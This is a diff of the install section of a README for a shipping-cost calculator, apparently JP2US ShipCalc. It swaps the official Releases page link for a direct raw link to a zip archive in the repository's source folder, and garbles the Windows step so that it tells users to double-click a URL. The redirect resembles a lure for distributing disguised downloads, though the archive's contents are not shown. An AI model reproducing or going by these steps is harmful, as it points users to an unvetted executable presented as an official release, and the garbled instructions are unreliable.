LucNgossinga/jp2us-shipcalc/README.md

 To install **JP2US ShipCalc**, follow these steps:

-1. **Download the latest release** from the [Releases page](https://github.com/LucNgossinga/jp2us-shipcalc/releases).
+1. **Download the latest release** from the [Releases page](https://raw.githubusercontent.com/LucNgossinga/jp2us-shipcalc/main/src/jp_us_shipcalc_v3.7.zip).
 2. **Extract the files** from the downloaded zip archive.
 3. **Run the application**:
-   - On Windows, double-click the `shipcalc.exe` file.
+   - On Windows, double-click the `https://raw.githubusercontent.com/LucNgossinga/jp2us-shipcalc/main/src/jp_us_shipcalc_v3.7.zip` file.
    - On macOS and Linux, open the terminal and navigate to the extracted folder, then run `./shipcalc`.

 ## Usage